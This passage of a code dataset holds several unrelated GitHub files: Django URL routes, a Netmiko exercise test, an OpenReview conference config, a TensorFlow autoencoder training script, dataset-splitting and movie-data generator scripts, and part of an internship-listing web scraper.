CategoryList, add_subscribe, IndexView\nfrom django.views.decorators.cache import cache_page\n\n# Если вы используете классовые представления или дженерики, то нужно добавлять кэширование напрямую в urls.py\n# (в котором хранятся именно сами представления, а не основной urls.py из папки с settings.py).\nurlpatterns = [\n path('', PostList.as_view()),\n path('article/', ArticleList.as_view(), name='article_list'),\n path('<int:pk>', cache_page(300)(PostDetail.as_view())), # добавим кэширование на детали товара. Раз в 100 сек товар будет записываться в кэш для экономии ресурсов.\n path('search/', PostSearch.as_view(), name='search'),\n path('<int:pk>/edit/', PostUpdateView.as_view(), name='edit'),\n path('<int:pk>/delete', PostDeleteView.as_view(), name='post_delete'),\n path('create/', PostCreate.as_view(), name='post_create'),\n path('user/', UserUpdateView.as_view(), name='user_update'),\n path('gradient/', GradientView.as_view(), name='gradient'),\n path('sub/', CategoryList.as_view(), name='category'), # Путь к списку категорий с кнопками на подписку\n path('sub/subscribe/', add_subscribe, name='subscribe'),\n path('', IndexView.as_view())\n]\n","repo_name":"KappaPower/D8-13","sub_path":"NewsPortal/news/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40925768577","text":"import pytest\nimport task_24_2a\nfrom netmiko.cisco.cisco_ios import CiscoIosSSH\nimport sys\n\nsys.path.append(\"..\")\n\nfrom pyneng_common_functions import check_class_exists, check_attr_or_method\n\n# Checking that the test is called via pytest ... 
and not python ...\nfrom _pytest.assertion.rewrite import AssertionRewritingHook\n\nif not isinstance(__loader__, AssertionRewritingHook):\n print(f\"Tests should be called using this expression:\\npytest {__file__}\\n\\n\")\n\n\ndef test_class_created():\n check_class_exists(task_24_2a, \"MyNetmiko\")\n\n\ndef test_class_inheritance(first_router_from_devices_yaml):\n ssh = task_24_2a.MyNetmiko(**first_router_from_devices_yaml)\n ssh.disconnect()\n assert isinstance(ssh, CiscoIosSSH), \"MyNetmiko class must inherit from CiscoIosSSH\"\n check_attr_or_method(ssh, method=\"send_command\")\n check_attr_or_method(ssh, method=\"_check_error_in_command\")\n\n\n@pytest.mark.parametrize(\n \"error,command\",\n [\n (\"Invalid input detected\", \"sh ip br\"),\n (\"Incomplete command\", \"copy\"),\n (\"Ambiguous command\", \"a\"),\n ],\n)\ndef test_errors(first_router_from_devices_yaml, command, error):\n ssh = task_24_2a.MyNetmiko(**first_router_from_devices_yaml)\n output = ssh.send_command(\"sh run | i hostname\")\n assert (\n \"hostname\" in output\n ), \"After creating an instance of the class, you must connect to the equipment and switch to enable mode\"\n\n with pytest.raises(task_24_2a.ErrorInCommand) as excinfo:\n return_value = ssh.send_command(command)\n ssh.disconnect()\n assert error in str(\n excinfo\n ), \"send_command method should raise an exception when the command is executed with an error\"\n","repo_name":"natenka/pyneng-examples-exercises-en","sub_path":"exercises/24_oop_inheritance/test_task_24_2a.py","file_name":"test_task_24_2a.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"37"} +{"seq_id":"2793208047","text":"#!/usr/bin/python\n\nimport sys, os\n\n\"\"\"\nGROUPS\n\nDefines constants for CONF (the name of the conference), and for the names of each group.\nAll other groups will be named by joining the name with CONF: <CONF>/<NAME>\n\nExample:\n\n CONF = 'my.conference/2017'\n PROGRAM_CHAIRS = 'Program_Chairs'\n\n --> my.conference/2017/Program_Chairs\n\n\"\"\"\n\nCONF = \"swsa.semanticweb.org/ISWC/2017/DeSemWeb\"\nADMIN = CONF + '/Admin'\nPROGRAM_CHAIRS = CONF + '/Program_Chairs'\nAREA_CHAIRS = CONF + '/Area_Chairs'\nREVIEWERS = CONF + '/Reviewers'\n\"\"\"24 August 23:59:59 Hawaii Time\n == GMT: Friday, August 25, 2017 9:59:59 AM\"\"\"\nDUE_TIMESTAMP = 1503698399000\nWEBPATH = os.path.abspath(os.path.join(os.path.dirname(__file__), '../webfield/conf.html'))\n\n\"\"\"\nINVITATIONS\n\nDefines constants for various invitations.\nThe full name of an invitation will be generated by joining the name with CONF by \"/-/\": <CONF>/-/<INVITATION_NAME>\n\nExample:\n\n CONF = 'my.conference/2017'\n SUBMISSION = 'Submission'\n\n --> my.conference/2017/-/Submission\n\n\"\"\"\n\nSUBMISSION = CONF + '/-/Submission'\nCOMMENT = CONF + '/-/Comment'\n\n\n\"\"\"\nPARAMETERS\n\nDictionaries that represent argument combinations defining Group and Invitation permissions.\n\nExample:\n\n restricted = {\n 'readers': [CONF],\n 'writers': [CONF],\n 'signatories': [CONF],\n }\n\n The \"restricted\" configuration above will only allow the CONF group to read, write, and sign\n for the newly created Group that uses it.\n\"\"\"\n\ngroup_params = {\n 'readers': [CONF, PROGRAM_CHAIRS],\n 'writers': [CONF],\n 'signatories': [CONF],\n 'signatures': [CONF]\n}\n\nsubmission_params = {\n 'readers': ['everyone'],\n 'writers': [CONF],\n 'invitees': ['~'],\n 'signatures': [CONF],\n 'process': 
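# (hedged aside) the '<CONF>/-/<NAME>' invitation naming rule documented above, checked against the module's own constants:\nassert SUBMISSION == CONF + '/-/' + 'Submission'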
os.path.abspath(os.path.join(os.path.dirname(__file__), '../process/submissionProcess.js'))\n}\n\ncomment_params = {\n 'readers': ['everyone'],\n 'writers': [CONF],\n 'invitees': ['~'],\n 'signatures': [CONF],\n 'process': os.path.abspath(os.path.join(os.path.dirname(__file__), '../process/commentProcess.js'))\n}\n\n\"\"\"\nTEMPLATES\n\n\"\"\"\n\n\nsubmission_reply = {\n 'forum': None,\n 'replyto': None,\n 'invitation': None,\n 'readers': {\n 'description': 'The users who will be allowed to read the above content.',\n 'values': ['everyone']\n },\n 'signatures': {\n 'description': 'How your identity will be displayed with the above content.',\n 'values-regex': '~.*'\n },\n 'writers': {\n 'values-regex': '~.*'\n },\n 'content':{\n 'title': {\n 'description': 'Title of paper.',\n 'order': 1,\n 'value-regex': '.{1,250}',\n 'required':True\n },\n 'submission category': {\n 'description': 'Select a submission category',\n 'order': 2,\n 'value-radio': ['Research Article','Intelligent Client Challenge / Demo', 'Vision Statement'],\n 'required': True\n },\n 'authors': {\n 'description': 'Comma separated list of author names.',\n 'order': 3,\n 'values-regex': \"[^;,\\\\n]+(,[^,\\\\n]+)*\",\n 'required':True\n },\n 'authorids': {\n 'description': 'Comma separated list of author email addresses, lowercased, in the same order as above. For authors with existing OpenReview accounts, please make sure that the provided email address(es) match those listed in the author\\'s profile.',\n 'order': 4,\n 'values-regex': \"([a-z0-9_\\-\\.]{2,}@[a-z0-9_\\-\\.]{2,}\\.[a-z]{2,},){0,}([a-z0-9_\\-\\.]{2,}@[a-z0-9_\\-\\.]{2,}\\.[a-z]{2,})\",\n 'required':True\n },\n 'keywords': {\n 'description': 'Comma separated list of keywords.',\n 'order': 6,\n 'values-regex': \"(^$)|[^;,\\\\n]+(,[^,\\\\n]+)*\"\n },\n 'TL;DR': {\n 'description': '\\\"Too Long; Didn\\'t Read\\\": a short sentence describing your paper',\n 'order': 7,\n 'value-regex': '[^\\\\n]{0,250}',\n 'required':False\n },\n 'abstract': {\n 'description': 'Abstract of paper.',\n 'order': 8,\n 'value-regex': '[\\\\S\\\\s]{1,5000}',\n 'required':True\n },\n 'pdf': {\n 'description': 'Upload a PDF file or submit a PDF URL (PDF URLs must begin with \"http\" or \"https\" and end with \".pdf\"). Submit all other formats in the \"url\" field below.',\n 'order': 9,\n 'value-regex': 'upload|http(s)?:\\/\\/.+\\.pdf',\n 'required': False\n },\n 'url': {\n 'description': 'Submit a non-PDF URL (e.g. HTML submissions). 
URLs must begin with \"http\" or \"https\".',\n 'order': 10,\n 'value-regex': 'http(s)?:\\/\\/.+',\n 'required': False\n }\n }\n}\n\ncomment_reply = {\n 'forum': None,\n 'replyto': None,\n 'invitation': SUBMISSION,\n 'readers': {\n 'description': 'The users who will be allowed to read the above content.',\n 'values': ['everyone']\n },\n 'signatures': {\n 'description': 'How your identity will be displayed with the above content.',\n 'values-regex': '~.*'\n },\n 'writers': {\n 'values-regex': '~.*'\n },\n 'content':{\n 'title': {\n 'order': 0,\n 'value-regex': '.{1,500}',\n 'description': 'Brief summary of your comment.',\n 'required': True\n },\n 'comment': {\n 'order': 1,\n 'value-regex': '[\\\\S\\\\s]{1,5000}',\n 'description': 'Your comment or reply.',\n 'required': True\n }\n }\n}\n","repo_name":"openreview/openreview-scripts","sub_path":"venues/swsa.semanticweb.org/ISWC/2017/DeSemWeb/python/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":5618,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"72948772268","text":"# Checking diffeomorphism\n\n# delay_embedded_system_no = 24\n# RUN_NO = 3\n\n# delay_embedded_system_no = 34\n# RUN_NO = 1\n\ndelay_embedded_system_no = 44\nRUN_NO = 0\n\n# delay_embedded_system_no = 53\n# RUN_NO = 1\n\n\n\n\n\n\nimport numpy as np\nimport pandas as pd\nfrom scipy.integrate import odeint\nimport matplotlib.pyplot as plt\nfrom itertools import product\nimport random\nimport seaborn as sb\nfrom sklearn.preprocessing import Normalizer, MinMaxScaler, StandardScaler\nfrom sklearn.metrics import r2_score\nimport copy\nimport pickle\nplt.rcParams[\"font.family\"] = \"Avenir\"\nplt.rcParams[\"mathtext.fontset\"] = \"cm\"\nplt.rcParams[\"font.size\"] = 22\nimport os\nimport shutil\nimport tensorflow as tf\nimport math\n\ndef weight_variable(shape):\n std_dev = math.sqrt(3.0 / (shape[0] + shape[1]))\n return tf.Variable(tf.truncated_normal(shape, mean=0.0, stddev=std_dev, dtype=tf.float32))\ndef bias_variable(shape):\n std_dev = math.sqrt(3.0 / shape[0])\n return tf.Variable(tf.truncated_normal(shape, mean=0.0, stddev=std_dev, dtype=tf.float32))\ndef initialize_Wblist(n_u, hv_list):\n # INITIALIZATION - going from input to first layer\n W_list = [weight_variable([n_u, hv_list[0]])]\n b_list = [bias_variable([hv_list[0]])]\n # PROPAGATION - consecutive layers\n for k in range(1,len(hv_list)):\n W_list.append(weight_variable([hv_list[k - 1], hv_list[k]]))\n b_list.append(bias_variable([hv_list[k]]))\n return W_list, b_list\n\n\ndef get_dict_param(run_folder_name_curr,SYS_NO,sess):\n dict_p = {}\n saver = tf.compat.v1.train.import_meta_graph(run_folder_name_curr + '/System_' + str(SYS_NO) + '_DeepDMDdata_Scaled.pickle.ckpt.meta', clear_devices=True)\n saver.restore(sess, tf.train.latest_checkpoint(run_folder_name_curr))\n try:\n psixpT = tf.get_collection('psixpT')[0]\n psixfT = tf.get_collection('psixfT')[0]\n xpT_feed = tf.get_collection('xpT_feed')[0]\n xfT_feed = tf.get_collection('xfT_feed')[0]\n KxT = tf.get_collection('KxT')[0]\n KxT_num = sess.run(KxT)\n dict_p['psixpT'] = psixpT\n dict_p['psixfT'] = psixfT\n dict_p['xpT_feed'] = xpT_feed\n dict_p['xfT_feed'] = xfT_feed\n dict_p['KxT_num'] = KxT_num\n except:\n print('State info not found')\n try:\n ypT_feed = tf.get_collection('ypT_feed')[0]\n yfT_feed = tf.get_collection('yfT_feed')[0]\n dict_p['ypT_feed'] = ypT_feed\n dict_p['yfT_feed'] = yfT_feed\n WhT = tf.get_collection('WhT')[0]\n WhT_num = sess.run(WhT)\n dict_p['WhT_num'] 
= WhT_num\n except:\n print('No output info found')\n return dict_p\n\n# Load the dataset\nsimulation_data_file = 'System_' + str(delay_embedded_system_no) + '/System_' + str(delay_embedded_system_no) + '_SimulatedData.pickle'\nwith open(simulation_data_file, 'rb') as handle:\n ls_data = pickle.load(handle)\n# Load the simulation info [required to convert the data to the required format]\nsimulation_datainfo_file = 'System_' + str(delay_embedded_system_no) + '/System_' + str(delay_embedded_system_no) + '_SimulatedDataInfo.pickle'\nwith open(simulation_datainfo_file, 'rb') as handle:\n dict_data_info = pickle.load(handle)\nls_output_indices = dict_data_info['ls_measured_output_indices']\nn_outputs = len(ls_output_indices)\n# Load the scalers\nscaler_file = 'System_' + str(delay_embedded_system_no) + '/System_' + str(delay_embedded_system_no) + '_DataScaler.pickle'\nwith open(scaler_file, 'rb') as handle:\n dict_Scaler = pickle.load(handle)\nZ_Scaler = dict_Scaler['XT']\n\nn_delay_embedding = np.int(np.mod(delay_embedded_system_no,10))\nXdim = ls_data[0]['XT'].shape[1]\nYdim = len(ls_output_indices)\nn_timepts = ls_data[0]['XT'].shape[0]\nZdim = Ydim*n_delay_embedding\n\n\n# Organizing the data\ninput_X_data = np.empty((0,Xdim))\ninput_Y_data = np.empty((0,Ydim))\ninput_Z_data = np.empty((0,n_delay_embedding*Ydim))\nfor data_i in ls_data:\n for i in range(n_timepts - n_delay_embedding):\n input_X_data = np.concatenate([input_X_data, data_i['XT'][i:i + 1, :]],axis=0)\n input_Y_data = np.concatenate([input_Y_data, data_i['YT'][i:i + 1, ls_output_indices]], axis=0)\n input_Z_data = np.concatenate([input_Z_data, data_i['YT'][i:i + n_delay_embedding, ls_output_indices].T.reshape(1, -1)], axis=0)\n\n# Separate the data into training, validation and test\nn_train = np.int(np.ceil(input_Y_data.shape[0]/3))\nX_train_data = input_X_data [0:n_train,:]\nY_train_data = input_Y_data [0:n_train,:]\nZ_train_data = input_Z_data [0:n_train,:]\nX_valid_data = input_X_data [n_train:2*n_train,:]\nY_valid_data = input_Y_data [n_train:2*n_train,:]\nZ_valid_data = input_Z_data [n_train:2*n_train,:]\nX_test_data = input_X_data [2*n_train:,:]\nY_test_data = input_Y_data [2*n_train:,:]\nZ_test_data = input_Z_data [2*n_train:,:]\n\n# Define a Scaler for the state\nX_Scaler = StandardScaler()\nX_Scaler.fit(X_train_data)\nY_Scaler = StandardScaler()\nY_Scaler.fit(Y_train_data)\n\n# Construct the scaled data\nXs_train_data = X_Scaler.transform(X_train_data)\nXs_valid_data = X_Scaler.transform(X_valid_data)\nXs_test_data = X_Scaler.transform(X_test_data)\nYs_train_data = Y_Scaler.transform(Y_train_data)\nYs_valid_data = Y_Scaler.transform(Y_valid_data)\nYs_test_data = Y_Scaler.transform(Y_test_data)\nZs_train_data = Z_Scaler.transform(Z_train_data)\nZs_valid_data = Z_Scaler.transform(Z_valid_data)\nZs_test_data = Z_Scaler.transform(Z_test_data)\n\n\n# Import the tensorflow session\nsess = tf.InteractiveSession()\nrun_folder_name = 'System_' + str(delay_embedded_system_no) + '/MyMac/RUN_' + str(RUN_NO)\ndict_model = get_dict_param(run_folder_name, delay_embedded_system_no, sess)\n\n# # Load the hyperparameters for each run\n# with open(run_folder_name_i + '/dict_hyperparameters.pickle', 'rb') as handle:\n# dict_run_i_info = pickle.load(handle)\n\n# Lift the data to construct psiZ\npsiZ_train = dict_model['psixpT'].eval(feed_dict={dict_model['xpT_feed']: Zs_train_data})\npsiZ_valid = dict_model['psixpT'].eval(feed_dict={dict_model['xpT_feed']: Zs_valid_data})\npsiZ_test = 
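# --- Illustrative aside (my sketch, not from the original repo): the nested
# loop above builds each row of input_Z_data by stacking n_delay_embedding
# consecutive output samples and flattening them, exactly as
# YT[i:i + n, :].T.reshape(1, -1) does. The same windowing in isolation, with
# toy shapes:
import numpy as np

YT = np.arange(20, dtype=float).reshape(10, 2)  # 10 timepoints, 2 outputs
n_delay = 3
Z = np.stack([YT[i:i + n_delay, :].T.reshape(-1)
              for i in range(YT.shape[0] - n_delay)])
print(Z.shape)  # (7, 6): one flattened delay window per starting timepoint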
dict_model['psixpT'].eval(feed_dict={dict_model['xpT_feed']: Zs_test_data})\npsiZdim = psiZ_train.shape[1]\n\n# Define the autoencoder training parameters\nn_hidden_layers = 2\nn_nodes = psiZdim\n\n\nDEVICE_NAME = '/cpu:0'\nn_embedded_state_dimension = Xdim\nkeep_prob = 1\nactivation_flag = 1\nres_net = 0\nls_dict_training_params = []\nls_dict_training_params.append({'step_size': 0.5, 'max_epochs':50000})\nls_dict_training_params.append({'step_size': 0.3, 'max_epochs':50000})\nls_dict_training_params.append({'step_size': 0.1, 'max_epochs':50000})\nls_dict_training_params.append({'step_size': 0.05, 'max_epochs':50000})\nls_dict_training_params.append({'step_size': 0.03, 'max_epochs':50000})\nls_dict_training_params.append({'step_size': 0.01, 'max_epochs':50000})\nenc_hidden_vars_list = [n_nodes] * n_hidden_layers\nenc_hidden_vars_list.append(n_embedded_state_dimension)\ndec_hidden_vars_list = [n_nodes] * n_hidden_layers\ndec_hidden_vars_list.append(psiZdim)\n\n# Define and train the autoencoder\n# Neural networks initialized\nenc_Wx_list, enc_bx_list = initialize_Wblist(psiZdim, enc_hidden_vars_list)\ndec_Wx_list, dec_bx_list = initialize_Wblist(n_embedded_state_dimension, dec_hidden_vars_list)\npsiZ_feed = tf.placeholder(tf.float32, shape=[None, psiZdim])\npsiZ_encoded_feed = tf.placeholder(tf.float32, shape=[None, n_embedded_state_dimension])\nX_feed = tf.placeholder(tf.float32, shape=[None, Xdim])\nstep_size = tf.placeholder(tf.float32, shape=[])\n# ENCODER\nenc_z_list = []\nif activation_flag == 1: # RELU\n enc_z_list.append(tf.nn.dropout(tf.nn.relu(tf.matmul(psiZ_feed, enc_Wx_list[0]) + enc_bx_list[0]), keep_prob))\nif activation_flag == 2: # ELU\n enc_z_list.append(tf.nn.dropout(tf.nn.elu(tf.matmul(psiZ_feed, enc_Wx_list[0]) + enc_bx_list[0]), keep_prob))\nif activation_flag == 3: # tanh\n enc_z_list.append(tf.nn.dropout(tf.nn.tanh(tf.matmul(psiZ_feed, enc_Wx_list[0]) + enc_bx_list[0]), keep_prob))\nfor k in range(1, len(enc_hidden_vars_list) - 1):\n prev_layer_output = tf.matmul(enc_z_list[k - 1], enc_Wx_list[k]) + enc_bx_list[k]\n if activation_flag == 1: # RELU\n enc_z_list.append(tf.nn.dropout(tf.nn.relu(prev_layer_output), keep_prob))\n if activation_flag == 2: # ELU\n enc_z_list.append(tf.nn.dropout(tf.nn.elu(prev_layer_output), keep_prob))\n if activation_flag == 3: # tanh\n enc_z_list.append(tf.nn.dropout(tf.nn.tanh(prev_layer_output), keep_prob))\npsiZ_encoded = tf.matmul(enc_z_list[-1], enc_Wx_list[-1]) + enc_bx_list[-1]\n# DECODER\ndec_z_list = []\nif activation_flag == 1: # RELU\n dec_z_list.append(tf.nn.dropout(tf.nn.relu(tf.matmul(psiZ_encoded, dec_Wx_list[0]) + dec_bx_list[0]), keep_prob))\n psiZ_decoded_from_encoded = tf.nn.dropout(tf.nn.relu(tf.matmul(psiZ_encoded_feed, dec_Wx_list[0]) + dec_bx_list[0]),keep_prob)\nif activation_flag == 2: # ELU\n dec_z_list.append(tf.nn.dropout(tf.nn.elu(tf.matmul(psiZ_encoded, dec_Wx_list[0]) + dec_bx_list[0]), keep_prob))\n psiZ_decoded_from_encoded = tf.nn.dropout(tf.nn.elu(tf.matmul(psiZ_encoded_feed, dec_Wx_list[0]) + dec_bx_list[0]), keep_prob)\nif activation_flag == 3: # tanh\n dec_z_list.append(tf.nn.dropout(tf.nn.tanh(tf.matmul(psiZ_encoded, dec_Wx_list[0]) + dec_bx_list[0]), keep_prob))\n psiZ_decoded_from_encoded = tf.nn.dropout(tf.nn.tanh(tf.matmul(psiZ_encoded_feed, dec_Wx_list[0]) + dec_bx_list[0]),keep_prob)\nfor k in range(1, len(dec_hidden_vars_list) - 1):\n prev_layer_output = tf.matmul(dec_z_list[k - 1], dec_Wx_list[k]) + dec_bx_list[k]\n psiZ_decoded_from_encoded = tf.matmul(psiZ_decoded_from_encoded, 
dec_Wx_list[k]) + dec_bx_list[k]\n if activation_flag == 1: # RELU\n dec_z_list.append(tf.nn.dropout(tf.nn.relu(prev_layer_output), keep_prob))\n psiZ_decoded_from_encoded = tf.nn.dropout(tf.nn.relu(psiZ_decoded_from_encoded), keep_prob)\n if activation_flag == 2: # ELU\n dec_z_list.append(tf.nn.dropout(tf.nn.elu(prev_layer_output), keep_prob))\n psiZ_decoded_from_encoded = tf.nn.dropout(tf.nn.elu(psiZ_decoded_from_encoded), keep_prob)\n if activation_flag == 3: # tanh\n dec_z_list.append(tf.nn.dropout(tf.nn.tanh(prev_layer_output), keep_prob))\n psiZ_decoded_from_encoded = tf.nn.dropout(tf.nn.tanh(psiZ_decoded_from_encoded), keep_prob)\npsiZ_decoded_from_encoded = tf.matmul(psiZ_decoded_from_encoded, dec_Wx_list[-1]) + dec_bx_list[-1]\npsiZ_decoded = tf.matmul(dec_z_list[-1], dec_Wx_list[-1]) + dec_bx_list[-1]\n# Outputs - Yencoded_from_decoded, Y_decoded, Y_encoded\n# OBJECTIVE FUNCTION CONSTRUCTION\ntruth = tf.concat([psiZ_feed, X_feed], axis=1)\nprediction = tf.concat([psiZ_decoded, psiZ_encoded], axis=1)\n# truth = Y_feed\n# prediction = Y_decoded\nSSE = tf.math.reduce_mean(tf.math.square(truth - prediction))\n# SST = tf.math.reduce_sum(tf.math.square(truth - tf.math.reduce_mean(truth,axis=0)))\n# r2 = (1 - tf.divide(SSE, SST)) * 100\n\nloss_fn = SSE\noptimizer = tf.train.AdagradOptimizer(step_size).minimize(loss_fn)\nsess.run(tf.global_variables_initializer())\n# Feed the right data\ndict_fed_training_data = {psiZ_feed: psiZ_train, X_feed: Xs_train_data}\ndict_fed_validation_data = {psiZ_feed: psiZ_valid, X_feed: Xs_valid_data}\n# TRAIN THE NEURAL NET\nprint('Training Error : ', loss_fn.eval(dict_fed_training_data))\nprint('Validation Error : ', loss_fn.eval(dict_fed_validation_data))\nfor dict_training_params in ls_dict_training_params:\n dict_fed_training_data[step_size] = dict_training_params['step_size']\n print('==================================')\n print('Running Step Size :', dict_training_params['step_size'])\n for i in range(dict_training_params['max_epochs']):\n optimizer.run(feed_dict=dict_fed_training_data)\n print('Training Error : ', loss_fn.eval(dict_fed_training_data))\n print('Validation Error : ', loss_fn.eval(dict_fed_validation_data))\n print('X equal accuracy : ', np.max([0, 100 * r2_score(X_train_data, X_Scaler.inverse_transform(psiZ_encoded.eval({psiZ_feed: psiZ_train})))]))\n psiZ_est = psiZ_decoded.eval({psiZ_feed: psiZ_train})\n # print('psiZ reconstruction accuracy : ', np.max([0, 100 * r2_score(psiZ_train, psiZ_est)]))\n print('Z reconstruction accuracy : ', np.max([0, 100 * r2_score(Z_train_data, Z_Scaler.inverse_transform(psiZ_est[:,0:Zdim]) )]))\n\n## Save the run\ndict_dump = {}\ndict_dump['system_no'] = delay_embedded_system_no\ndict_dump['n_delay_embedding'] = np.int(np.mod(delay_embedded_system_no,10))\ndict_dump['run_no'] = RUN_NO\n# All scalers\ndict_dump['XT_Scaler'] = X_Scaler\ndict_dump['YT_Scaler'] = Y_Scaler\ndict_dump['ZT_Scaler'] = Z_Scaler\n\nsaver_i = tf.compat.v1.train.Saver()\n# Feed Variables\ntf.compat.v1.add_to_collection('XT_feed', X_feed)\ntf.compat.v1.add_to_collection('psiZT_feed', psiZ_feed)\ntf.compat.v1.add_to_collection('psiZT_encoded_feed', psiZ_encoded_feed)\n# Evaluation Variables\ntf.compat.v1.add_to_collection('psiZT_decoded_from_encoded', psiZ_decoded_from_encoded)\ntf.compat.v1.add_to_collection('psiZT_decoded', psiZ_decoded)\ntf.compat.v1.add_to_collection('psiZT_encoded', psiZ_encoded)\n\nstorage_folder = 'AutoEncoder_Decoder/System_' + str(np.int(np.floor(delay_embedded_system_no/10)*10))\nif not 
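# --- Illustrative aside (my sketch, not the author's code): the objective
# above concatenates [psiZ, X] as the truth and [decoded(psiZ), encoded(psiZ)]
# as the prediction, so one MSE term makes the encoder output match the state
# X while the other makes the decoder reconstruct psiZ. A compact TF2/Keras
# restatement of that combined loss (all sizes hypothetical):
import tensorflow as tf

psiZ_dim, x_dim, hidden = 12, 4, 12
enc = tf.keras.Sequential([tf.keras.layers.Dense(hidden, activation='relu'),
                           tf.keras.layers.Dense(x_dim)])
dec = tf.keras.Sequential([tf.keras.layers.Dense(hidden, activation='relu'),
                           tf.keras.layers.Dense(psiZ_dim)])

psiZ = tf.random.normal((32, psiZ_dim))
X = tf.random.normal((32, x_dim))
z = enc(psiZ)
loss = tf.reduce_mean(tf.square(tf.concat([psiZ, X], 1)
                                - tf.concat([dec(z), z], 1)))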
os.path.exists(storage_folder):\n if not os.path.exists('AutoEncoder_Decoder'):\n os.mkdir('AutoEncoder_Decoder')\n os.mkdir(storage_folder)\nsaver_path_curr = saver_i.save(sess, storage_folder + '/autoenc_dec' + str() + '.ckpt')\nwith open(storage_folder + '/key_details.pickle', 'wb') as handle:\n pickle.dump(dict_dump, handle)\n","repo_name":"raghawardhan585/TS_AR_IFFL","sub_path":"Autoencoder_Decoder_Learning.py","file_name":"Autoencoder_Decoder_Learning.py","file_ext":"py","file_size_in_byte":13471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8017209639","text":"\nimport os\nimport glob\nimport argparse\nimport numpy as np\nimport random\n\nclasses_path = glob.glob('/raid/yuanyong/neuralcode/ncdata/*')\ntrain_samples = []\nval_samples = []\n\nimgs_total = 0\n\nfor i, class_path in enumerate(classes_path):\n class_ = class_path.split('/')[-1]\n imgs_path = glob.glob(class_path + '//*')\n num_imgs = len(imgs_path)\n num_train = int(num_imgs*0.6)\n num_val = num_imgs - num_train\n\n np.random.seed(1024)\n sample_idx = np.random.choice(range(num_imgs), num_imgs, replace=False)\n train_idx = sample_idx[0:num_train]\n val_idx = sample_idx[num_train:]\n\n for idx_ in train_idx:\n img_path = imgs_path[idx_]\n train_samples.append(img_path + ' ' + class_ + '\\n')\n\n for idx_ in val_idx:\n img_path = imgs_path[idx_]\n val_samples.append(img_path + ' ' + class_ + '\\n')\n\n imgs_total += num_imgs\n\n\nrandom.shuffle(train_samples)\nrandom.shuffle(val_samples)\n\nwith open('lmdb/train.txt', 'w') as f_train, open('lmdb/val.txt', 'w') as f_val:\n for sample in train_samples:\n f_train.write(sample)\n for sample in val_samples:\n f_val.write(sample)\n","repo_name":"willard-yuan/mykit","sub_path":"python/dl/generate_data.py","file_name":"generate_data.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"30057425974","text":"import random as rand\nimport csv\nmovies = []\ngenres = []\nserial = 0\n#opens the list of movies and saves in movies[]\nwith open(\"movies.csv\") as list:\n\tfor movie in list:\n\t\tmovie = movie.lower()\t\n\t\tmovies.append(movie)\ntotal_movies = len(movies)\n\nwith open(\"genres.csv\") as list:\n\tfor genre in list:\n\t\tgenre = genre.lower()\n\t\tgenres.append(genre)\ntotal_genres = len(genres)\n\n#randomly chooses films\nfor i in range(1000):\n\tindex = (rand.randrange(1000) % total_movies)\n\tg1 = (rand.randrange(1000) % total_genres)\n\tg2 = (rand.randrange(1000) % total_genres)\n\tg3 = (rand.randrange(1000) % total_genres)\n\n\tgenre1 = genres[g1].strip()\n\tgenre2 = genres[g2].strip()\n\tgenre3 = genres[g3].strip()\n\tserial += 1\n\tmovie = movies[index].strip()\n\t#print(f\"{serial},{movie},{genre1} {genre2} {genre3}\\n\")\n\t#saves in file\n\twith open(\"moviedata.csv\", mode=\"a\") as file:\n\t\tfile.write(f'{serial},{movie},{genre1} {genre2} {genre3}\\n')\n","repo_name":"1basilisk/Python","sub_path":"sql/genre.py","file_name":"genre.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9955938461","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport 
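# --- Illustrative aside (my sketch): generate_data.py above fixes the NumPy
# seed inside the per-class loop and draws a full permutation with
# replace=False, so the 60/40 train/val split is reproducible across runs
# (and identical for every class). The same idea in isolation, with made-up
# file names:
import numpy as np

paths = ['img_%d.jpg' % i for i in range(10)]
rng = np.random.RandomState(1024)            # same fixed seed as the script
order = rng.choice(len(paths), len(paths), replace=False)
n_train = int(len(paths) * 0.6)
train = [paths[i] for i in order[:n_train]]
val = [paths[i] for i in order[n_train:]]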
xlwt\r\n\r\nbook=xlwt.Workbook(encoding='utf-8',style_compression=0)\r\nsheet=book.add_sheet('实习僧',cell_overwrite_ok=True)\r\nsheet.write(0,0,'名称')\r\nsheet.write(0,1,'公司')\r\nsheet.write(0,2,'工资')\r\nsheet.write(0,3,'关键词')\r\nsheet.write(0,4,'城市')\r\nn=1\r\nheaders = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0\"}\r\ndef job_url():\r\n for i in range(1, 14):\r\n req = requests.get(\r\n f'https://www.shixiseng.com/interns?page={i}&keyword=python&type=intern&area=&months=&days=°ree=&official=&enterprise=&salary=-0&publishTime=&sortType=&city=%E5%85%A8%E5%9B%BD&internExtend=',\r\n headers=headers)\r\n html = req.text\r\n soup = BeautifulSoup(html, 'lxml')\r\n offers = soup.select('.intern-wrap.intern-item')\r\n for offer in offers:\r\n url = offer.select(\" .f-l.intern-detail__job a\")[0]['href']\r\n #detail_url(url)\r\n html = requests.get(url, headers=headers).text\r\n soup = BeautifulSoup(html, 'lxml')\r\n title = soup.title.text\r\n job = title.split(\"招聘\")[0]\r\n company_name = soup.select('.com_intro .com-name')[0].text.strip()\r\n #key_word=soup.select()\r\n key_word=soup.select(\".com-detail div\")[0].text.strip()\r\n city=soup.select(\".job_position\")[0].text.strip()\r\n salary = soup.select(\".job_money.cutom_font\")[0].text.encode(\"utf-8\")\r\n salary = salary.replace(b'\\xef\\x9a\\x8d', b\"0\")\r\n salary = salary.replace(b'\\xee\\x99\\xb1', b\"1\")\r\n salary = salary.replace(b'\\xef\\x9c\\x86', b\"2\")\r\n salary = salary.replace(b'\\xef\\x9b\\x8d', b\"3\")\r\n salary = 